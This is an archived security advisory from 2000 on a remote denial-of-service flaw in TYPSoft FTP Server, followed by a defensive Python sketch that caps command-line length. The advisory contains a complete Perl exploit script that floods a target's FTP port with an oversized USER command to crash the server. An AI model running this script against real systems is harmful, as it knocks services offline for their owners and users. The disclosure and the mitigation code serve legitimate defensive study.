typsoft-ftpd.txt

12 Sep 2000 00:00:00 | Reported by Dethy | Type: packetstorm | Source: packetstormsecurity.com

TYPSoft FTP Server has a remote DoS vulnerability from long command inputs causing crashes.

Code
`  
*******************************************  
+ TYPSoft FTP Server remote DoS Problem +  
*******************************************  
# Advisory by dethy #  
# www.synnergy.net #  
|=========================================|  
  
Advisory # 12  
  
Vulnerable: TYPSoft FTP Server 0.78 [ although 0.7X are also vulnerable ]  
Systems : Win9X, WinNT  
Product : http://www.multimania.com/typsoft/  
Discovery : [email protected]  
  
" Another trivial bug. "  
  
Description  
-----------  
  
TYPSoft FTP is a Freeware FTP server, with all the necessary  
features to facilitate beginners and advanced users.  
  
  
Vulnerability  
-------------  
  
TYPSoft FTP Server does not correctly handle commands longer than  
2048 bytes [ 2k ]. Sending a long 'user', 'pass', 'cwd', etc. causes  
the server to hang and consume increasing system resources.  
The process will not become active again until it is manually restarted.  
  
  
Exploit  
-------  
  
A simple script that sends a long 'user' command to the server, resulting  
in the ftpd crashing.  
  
================<cut>==================  
#!/usr/bin/perl  
use Getopt::Std;  
use IO::Socket;  
getopts('s:', \%args);  
if(!defined($args{s})){&usage;}  
$serv = $args{s};  
$foo = "A"; $number = 2048;   
$data .= $foo x $number; $EOL="\015\012";  
$remote = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => $args{s},  
PeerPort => "ftp(21)",  
) || die("Unable to connect to ftp port at $args{s}\n");  
$remote->autoflush(1);  
print $remote "USER $data". $EOL;  
while (<$remote>){ print }  
print("\nCrash was successful !\n");  
  
sub usage {die("\n$0 -s <server>\n\n");}  
================</cut>====================  
  
Solution  
--------  
  
The vendor [ [email protected] ] has been contacted. Wait until a patched version   
comes out or use an alternative product.  
  
  
Disclaimer  
----------  
  
Synnergy Networks may not be held liable for the use and/or potential effects of these  
programs or advisories, nor the content contained within. Use them at your own risk.  
  
---------------------------------------------------------------------------------------  
Web : http://www.synnergy.net  
E-Mail : [email protected]  
  
`
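
The advisory describes a server that mishandles control-channel commands longer than 2048 bytes; the server-side remedy for that class of bug is to cap command-line length before buffering. The sketch below is an added example, not code from the advisory or from TYPSoft: `CommandReader`, `replay`, the 512-byte cap and the reply text are assumptions, and the input is constructed.

```python
# Added example: hypothetical bounded reader for the FTP control channel.
MAX_LINE = 512  # assumed cap, well under the 2048 bytes named in the advisory
TOO_LONG = b"500 Command line too long.\r\n"  # 500 is the RFC 959 syntax-error reply


class CommandReader:
    """Split a control-channel byte stream into commands using bounded memory."""

    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = bytearray()
        self.discarding = False  # True while skipping the rest of an oversized line

    def feed(self, chunk):
        """Return ("cmd", line) and ("reply", bytes) events for one recv() chunk."""
        events = []
        self.buf += chunk
        while True:
            end = self.buf.find(b"\r\n")
            if end == -1:
                if self.discarding or len(self.buf) > self.max_line:
                    if not self.discarding:
                        events.append(("reply", TOO_LONG))
                        self.discarding = True
                    del self.buf[:-1]  # keep one byte: CRLF may straddle chunks
                return events
            line = bytes(self.buf[:end])
            del self.buf[:end + 2]
            if self.discarding:
                self.discarding = False  # tail of the rejected line, drop it
            elif len(line) > self.max_line:
                events.append(("reply", TOO_LONG))
            else:
                events.append(("cmd", line))


def replay(stream, chunk_size):
    """Feed a byte stream in fixed-size chunks and collect every event."""
    reader, events = CommandReader(), []
    for i in range(0, len(stream), chunk_size):
        events += reader.feed(stream[i:i + chunk_size])
    return events, len(reader.buf)


# Constructed input: an oversized USER line followed by a normal command.
SAMPLE = b"USER " + b"A" * 2048 + b"\r\n" + b"QUIT\r\n"

if __name__ == "__main__":
    print(replay(SAMPLE, 1000))
```

The oversized line is rejected once with a 500 reply and the session stays usable for the following command, whatever the chunking of the incoming bytes.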


Vulners AI Score: 7.4 (High risk)